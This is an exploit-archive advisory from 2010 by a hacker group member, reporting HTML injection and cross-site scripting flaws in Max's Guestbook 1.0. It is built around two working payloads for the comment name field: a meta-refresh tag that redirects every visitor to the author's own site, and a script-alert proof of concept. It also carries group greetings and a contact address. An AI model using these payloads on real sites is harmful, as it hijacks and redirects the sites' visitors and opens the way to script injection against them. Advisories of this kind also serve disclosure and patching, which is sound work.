Max's Guestbook - HTML Injection / Cross-Site Scripting



EKU-ID: 21226 CVE: OSVDB-ID:
Author: MiND C0re Published: 2010-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


================================================================
#                       In the name of ALLAH !                       #
======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __   __   /_  __/  #
#     / ___/  \ \  / /     / /     #
#    (__  )     \ \/ /     / /      #
#   /____/     \__/    /_/       #
#################################
########################################################################
# Name: Max's Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.phpf1.com/download.html?item=18
# Date: 2010-08-15
# Author: MiND
# Greets: Sa-ViRuS.CoM,RENO,Dr.php,!BaD BoY!,Gov.HaCker,AntiSeCuRe,Dr.$audi...
# Contact: SlaSHMiND@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################


[~] HTML Injection Vuln . :
Add A New Comment And The exploit is in Name :)
<meta http-equiv="refresh" content="0;url=http://sa-virus.com/" />
( thats redirecting to sa-virus.com )


[~] Xss Vuln. :
Add A New Comment And The exploit is in Name :)
<script>alert('MiND - Sa-ViRuS.CoM')</script>



Peace